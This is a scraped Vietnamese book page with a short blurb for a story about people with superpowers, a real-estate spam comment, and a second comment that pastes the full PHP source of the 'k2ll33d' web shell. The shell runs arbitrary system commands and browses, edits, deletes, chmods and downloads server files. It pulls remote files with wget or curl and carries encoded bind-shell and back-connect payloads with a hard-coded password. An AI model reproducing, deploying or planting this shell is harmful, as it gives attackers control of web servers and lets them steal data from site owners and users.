Chủng dị biệt

Đánh giá: 
4
Trung bình: 4 (2 votes)

Nếu thế giới này có dị nhân thì tại sao họ lại có dị năng?

Nếu họ có dị năng thì cuộc sống của họ sẽ như thế nào? 

Nếu cuộc sống của họ không khác gì địa ngục thì họ phải làm gì để thay đổi nó?

Nếu tương lai của họ đã bị thay đổi thì năng lực nào có thể giúp họ quay lại?

Nếu họ có thể trở về liệu họ cơ cơ hội để hối hận không?

Tất cả sẽ được tái hiện tại bộ truyện Chủng Dị Biệt
Trích dẫn từ sách

Bình luận

Ảnh của hoaidien
hoaidien07/06/2017 - 20:47

Bài thơ rất hay nếu bạn nào có nhu cầu ký gửi nhà đất đà nẵng lh mình nhé.

Đánh giá: 
2
Trung bình: 2 (1 vote)
Ảnh của quanghandsome
quanghandsome20/06/2017 - 22:29
 <?php
 // by k2ll33d / fb/k2ll33d
 set_time_limit(0);error_reporting(0);
 if(isset($_GET["dl"]) && ($_GET["dl"] != "")){$file = $_GET["dl"];$filez = @file_get_contents($file);header("Content-type: application/octet-stream");header("Content-length: ".strlen($filez));header("Content-disposition: attachment;filename=".basename($file).";");echo $filez;exit;}
 elseif(isset($_GET["dlgzip"]) && ($_GET["dlgzip"] != "")){$file = $_GET['dlgzip'];$filez = gzencode(@file_get_contents($file));header("Content-Type:application/x-gzip\n");header("Content-length: ".strlen($filez));header("Content-disposition: attachment;filename=".basename($file).".gz;");echo $filez;exit;}
 if(isset($_GET["img"])){@ob_clean();$d = magicboom($_GET["y"]);$f = $_GET["img"];$inf = @getimagesize($d.$f);$ext = explode($f,".");$ext = $ext[count($ext)-1];@header("Content-type: ".$inf["mime"]);@header("Cache-control: public");@header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));@header("Cache-control: max-age=".(60*60*24*7));@readfile($d.$f);exit;} $software = getenv("SERVER_SOFTWARE");
 if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE;else $safemode = FALSE;$system = @php_uname();if(strtolower(substr($system,0,3)) == "win")
 $win = TRUE;else $win = FALSE;if(isset($_GET['y'])){if(@is_dir($_GET['view'])){$pwd = $_GET['view'];@chdir($pwd);} else{$pwd = $_GET['y'];@chdir($pwd);} }
 if(!$win){if(!$user = rapih(exe("whoami")))$user = "";if(!$id = rapih(exe("id"))) $id = "";$prompt = $user." \$ ";$pwd = @getcwd().DIRECTORY_SEPARATOR;}
 else {$user = @get_current_user();$id = $user;$prompt = $user." &gt;";$pwd = realpath(".")."\\";$v = explode("\\",$d);$v = $v[0];foreach (range("A","Z") as $letter) {$bool = @is_dir($letter.":\\");if ($bool){$letters .= "<a href='?y=".$letter.":\\'>[ ";if ($letter.":" != $v){$letters .= $letter;} else {$letters .= "<span class='gaya'>".$letter."</span>";} $letters .= " ]</a> ";}}}
 if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
 else $posix = FALSE;$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);$my_ip = $_SERVER['REMOTE_ADDR'];$bindport = "13123";$bindport_pass = "k2ll33d";$pwds = explode(DIRECTORY_SEPARATOR,$pwd);$pwdurl = "";for($i = 0 ;$i < sizeof($pwds)-1 ;$i++){$pathz = "";for($j = 0 ;$j <= $i ;$j++){$pathz .= $pwds[$j].DIRECTORY_SEPARATOR;} $pwdurl .= "<a href='?y=".$pathz."'>".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";}
 if(isset($_POST['rename'])){$old = $_POST['oldname'];$new = $_POST['newname'];@rename($pwd.$old,$pwd.$new);$file = $pwd.$new;} if(isset($_POST['chmod'])){
 $name = $_POST['name'];$value = $_POST['newvalue'];if (strlen($value)==3){$value = 0 . "" . $value;}@chmod($pwd.$name,octdec($value));$file = $pwd.$name;}
 if(isset($_POST['chmod_folder'])){$name = $_POST['name'];$value = $_POST['newvalue'];if (strlen($value)==3){$value = 0 . "" . $value;}@chmod($pwd.$name,octdec($value));$file = $pwd.$name;} $buff = "&nbsp;".$software."<br>";$buff .= "&nbsp;".$system."<br>";if($id != "") $buff .= "&nbsp;".$id."<br>";if($safemode) $buff .= "&nbsp;safemode :&nbsp;<b><font style='color:#DD4736'>ON</font></b><br>";else $buff .= "&nbsp;safemode :&nbsp;<b><font style='color:#00FF00'>OFF</font></b><br>";
 function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF00'>ON</font></b>";}else {return "<b><font style='color:#ff0000'>OFF</font></b>";}}
 function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
 function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
 function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
 function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
 $buff .= "&nbsp;MySQL: ".testmysql()."&nbsp;|&nbsp;Perl: ".testperl()."&nbsp;|&nbsp;cURL: ".testcurl()."&nbsp;|&nbsp;WGet: ".testwget()."<br>";
 $buff .= "&nbsp;".$letters."&nbsp;&gt;&nbsp;".$pwdurl;
 function rapih($text){return trim(str_replace("<br>","",$text));}
 function magicboom($text){if (!get_magic_quotes_gpc()){return $text;} return stripslashes($text);}
 function showdir($pwd,$prompt){$fname = array();$dname = array();
 if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))
 $posix = TRUE;else $posix = FALSE;$user = "????:????";
 if($dh = opendir($pwd)){while($file = readdir($dh)){
 if(is_dir($file)){$dname[] = $file;}
 elseif(is_file($file)){$fname[] = $file;}}closedir($dh);} sort($fname);sort($dname);$path = @explode(DIRECTORY_SEPARATOR,$pwd);$tree = @sizeof($path);$parent = "";
 $buff = " <form action='?y=".$pwd."&amp;x=shell' method='post' style='margin:8px 0 0 0;'><table class='cmdbox' style='width:50%;'><tr><td>$prompt</td><td><input onMouseOver='this.focus();' id='cmd' class='inputz' type='text' name='cmd' style='width:400px;' value='' /><input class='inputzbut' type='submit' value='execute !' name='submitcmd' style='width:80px;' /></td></tr></form><form action='?' method='get' style='margin:8px 0 0 0;'><input type='hidden' name='y' value='".$pwd."' /><tr><td>view file/folder</td><center><td><input onMouseOver='this.focus();' id='goto' class='inputz' type='text' name='view' style='width:400px;' value='".$pwd."' /><input class='inputzbut' type='submit' value='view !' name='submitcmd' style='width:80px;' /></td></center></tr></form></table><table class='explore'> <tr><th>name</th><th style='width:80px;'>size</th><th style='width:210px;'>owner:group</th><th style='width:80px;'>perms</th><th style='width:110px;'>modified</th><th style='width:190px;'>actions</th></tr> ";
 if($tree > 2)
 for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
 else $parent = $pwd;
 foreach($dname as $folder){
 if($folder == ".") {
 if(!$win && $posix){$name=@posix_getpwuid(@fileowner($folder));$group=@posix_getgrgid(@filegroup($folder));$owner = $name['name']."<span class='gaya'> : </span>".$group['name'];}
 else {$owner = $user;}
 $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>-</td>
 <td style=\"text-align:center;\">".$owner."</td>
 <td><center>".get_perms($pwd)."</center></td>
 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
 <a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a>
 </span><form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
 </form></td></tr> ";}
 elseif($folder == ".."){
 if(!$win && $posix)
 {$name=@posix_getpwuid(@fileowner($folder));$group=@posix_getgrgid(@filegroup($folder));
 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];}
 else { $owner = $user; }
 $buff .= "<tr><td>
 <a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'></a></td><td>-</td>
 <td style=\"text-align:center;\">".$owner."</td>
 <td><center>".get_perms($parent)."</center></td> <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
 <td><span id=\"titik2\"><a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
 <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
 </form></td></tr>";}else{if(!$win && $posix){
 $name=@posix_getpwuid(@fileowner($folder));
 $group=@posix_getgrgid(@filegroup($folder));
 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];}
 else { $owner = $user; }
 $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' /> $folder</a>
 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
 <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
 </form> </td><td>DIR</td><td style=\"text-align:center;\">".$owner."</td><td><center>
 <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
 <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
 <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
 onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a>| <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a>
 </td>
 </tr>";}}
 foreach($fname as $file){
 $full = $pwd.$file;
 if(!$win && $posix){$name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];}
 else { $owner = $user; }
 $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> $file</a>
 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
 <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" /><input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
 </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
 <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
 <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
 <input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
 <td><a href=\"?y=$pwd&amp;edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a>| <a href=\"?y=$pwd&amp;delete=$full\">delete</a> | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gz</a>)
 </td></tr>";}
 $buff .= "</table>"; return $buff;}
 function ukuran($file){if($size = @filesize($file)){if($size <= 1024) return $size;else{if($size <= 1024*1024) {$size = @round($size / 1024,2);;
 return "$size kb";} else {$size = @round($size / 1024 / 1024,2);return "$size mb";}}}
 else return "???";} function exe($cmd){if(function_exists('system')) {@ob_start();@system($cmd);$buff = @ob_get_contents();$buff = @ob_get_contents();@ob_end_clean();
 return $buff;} elseif(function_exists('exec')) {@exec($cmd,$results);$buff = "";foreach($results as $result){$buff .= $result;} return $buff;}
 elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$buff = @ob_get_contents();@ob_end_clean();return $buff;}
 elseif(function_exists('shell_exec')){$buff = @shell_exec($cmd);return $buff;}} function tulis($file,$text){$textz = gzinflate(base64_decode($text));if($filez = @fopen($file,"w")) {@fputs($filez,$textz);@fclose($file);}}
 function ambil($link,$file) {if($fp = @fopen($link,"r")){while(!feof($fp)){$cont.= @fread($fp,1024);}@fclose($fp);$fp2 = @fopen($file,"w");@fwrite($fp2,$cont);@fclose($fp2);} }
 function which($pr){$path = exe("which $pr");
 if(!empty($path)) {return trim($path);}
 else {return trim($pr);}}
 function download($cmd,$url){$namafile = basename($url);
 switch($cmd){case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;case 'wfread' : ambil($wurl,$namafile);break;case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;default: break;}
 return $namafile;}function get_perms($file) {if($mode=@fileperms($file)){$perms='';$perms .= ($mode & 00400) ? 'r' : '-';$perms .= ($mode & 00200) ? 'w' : '-';$perms .= ($mode & 00100) ? 'x' : '-';$perms .= ($mode & 00040) ? 'r' : '-';$perms .= ($mode & 00020) ? 'w' : '-';$perms .= ($mode & 00010) ? 'x' : '-';$perms .= ($mode & 00004) ? 'r' : '-';$perms .= ($mode & 00002) ? 'w' : '-';$perms .= ($mode & 00001) ? 'x' : '-';
 return $perms;}else return "??????????";}function clearspace($text){return str_replace(" ","_",$text);}$port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; ?>
 <html><head><title>k2ll33d</title><link href='http://fonts.googleapis.com/css?family=Orbitron:700' rel='stylesheet' type='text/css'>
 <script type="text/javascript">
 function tukar(lama,baru){document.getElementById(lama).style.display = 'none';
 document.getElementById(baru).style.display = 'block';}
 </script>
 <style>.title{font-weight:bold;letter-spacing:1px;font-family: "orbitron";color: #00ff00;font-size:20px;text-shadow: 5px 5px 5px black;}input[type=text]{-moz-box-shadow:0 0 1px black;-webkit-box-shadow:0 0 1px black;height:18px;margin-left: 5px;}input:focus, textarea:focus ,button:active{box-shadow: 0 0 5px #4C83AF;-webkit-box-shadow: 0 0 5px rgba(0, 0, 255, 1);-moz-box-shadow: 0 0 5px rgba(0, 0, 255, 1);background:#222222;overflow: auto;}#menu{font-family:orbitron;background: #111111;margin:5px 2px 4px 2px;}div #menu li:hover {cursor:pointer;}div#menu li:hover>ul a:hover{width:118;background:red;}div#menu ul {margin:0;padding:0;float:left;-moz-border-radius: 6px; border-radius: 12px; border:1px solid #555555;}div#menu li {position:relative;display:block;float:left;}div#menu li:hover>ul {left:0px;border-left:1px solid white;}div#menu a{display:block;float:left;font-family:orbitron;padding:4px 6px;margin:0;text-decoration:none;letter-spacing:1px;color:white;}div#menu a:hover{background:rgba(160, 82, 45,0.3);font-family:orbitron;border-bottom:0px;}div#menu ul ul {position:absolute;top:18px;left:-990em;width:130px;padding:5px 0 5px 0;background:black;margin-top:2px;}div#menu ul ul a {padding:2px 2px 2px 10px;height:20px;float:none;display:block;color:white;}.k2ll33d2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #00ff00;font-size:25px;text-shadow: 5px 5px 5px black;} .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #EC4D00; padding:4px 2px;width:70%;line-height:24px;background:#111111;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ffffff;-moz-box-shadow: 0px 4px 2px #ffffff;}.myboxtbl{ width:50%; }body{background:#010101;} a {text-decoration:none;} hr, a:hover{border-bottom:1px solid #4C83AF;} *{text-shadow: 0pt 0pt 0.3em rgb(153, 153, 153);font-size:11px;font-family:Tahoma,Verdana,Arial;color:#FFFFFF;} .tabnet{margin:15px auto 0 auto;border: 1px solid #333333;} .main {width:100%;} .gaya {color: #888888;} .top{border-left:1px solid #4C83AF;border-RIGHT:1px solid #4C83AF;font-family:verdana;} .inputz, option{outline:none;transition: all 0.20s ease-in-out;-webkit-transition: all 0.20s ease-in-out;-moz-transition: all 0.20s ease-in-out;border:1px solid rgba(0,0,0, 0.2);background:#111111; border:0; padding:2px; border-bottom:1px solid #393939; font-size:11px; color:#ffffff; -moz-border-radius: 6px; border-radius: 12px; border:1px solid #4C83AF;margin:4px 0 8px 0;} .inputzbut{background:#111111;color:#8f8f8f;margin:0 4px;border:1px solid #555555;} .inputzbut:hover{background:#222222;border-left:1px solid #4C83AF;border-right:1px solid #4C83AF;border-bottom:1px solid #4C83AF;border-top:1px solid #4C83AF;}.inputz:hover{ -moz-border-radius: 6px; border-radius: 10px; border:1px solid #4C83AF;margin:4px 0 8px 0;border-bottom:1px solid #4C83AF;border-top:1px solid #4C83AF;}.output2 {margin:auto;border:1px solid #888888;background:#000000;padding:0 2px;} textarea{margin:auto;border:2px solid #555555;background:#000000;padding:0 2px;} .output {margin:auto;border:1px solid #303030;width:100%;height:400px;background:#000000;padding:0 2px;} .cmdbox{width:100%;}.head_info{padding: 0 4px;} .b1{font-size:30px;padding:0;color:#555555;} .b2{font-size:30px;padding:0;color:#800000;} .b_tbl{text-align:center;margin:0 4px 0 0;padding:0 4px 0 0;border-right:1px solid #333333;} .phpinfo table{width:100%;padding:0 0 0 0;} .phpinfo td{background:#111111;color:#cccccc;padding:6px 8px;;} .phpinfo th, th{background:#191919;border-bottom:1px solid #333333;font-weight:normal;} .phpinfo h2, .phpinfo h2 a{text-align:center;font-size:16px;padding:0;margin:30px 0 0 0;background:#222222;padding:4px 0;} .explore{width:100%;} .explore a {text-decoration:none;} .explore td{border-bottom:1px solid #454545;padding:0 8px;line-height:24px;} .explore th{padding:3px 8px;font-weight:normal;color:#999999;} .explore th:hover , .phpinfo th:hover, th:hover{color:black;background:#00ff00;} .explore tr:hover{background:rgba(35,96,156,0.2);} .viewfile{background:#EDECEB;color:#000000;margin:4px 2px;padding:8px;} .sembunyi{display:none;padding:0;margin:0;} k, k a, k a:hover{text-shadow: 0pt 0pt 0.3em red;font-family:orbitron;font-size:25px;color:#ffffff;}</style><body onLoad="document.getElementById('cmd').focus();"><div class="main"><div class="head_info"> <table width="100%"><tr><td width="23%"><table class="b_tbl">
 <?php echo strtoupper((base64_decode('PGgyIGNsYXNzPSJ0aXRsZSI+azJsbDMzZCBTaGVsbDwvaDI+ICA=')));?><div id="menu"><a href="?<?php echo "y=".$pwd;?>&amp;x=about">About Me</a></div>
 </td></tr></table></td><td class="top" width='60%'><?php echo $buff;?></td>&nbsp;&nbsp;<td style="width:20%;"><a>server ip : <?php echo $server_ip."<br><br> your ip : ".$my_ip."<br></a>";?><br><a href="?" style="border:1px solid #EC4D00;font:12px orbitron;width:200px;padding:0px 20px 0px 20px;">H O M E</a></td></tr></table></div>
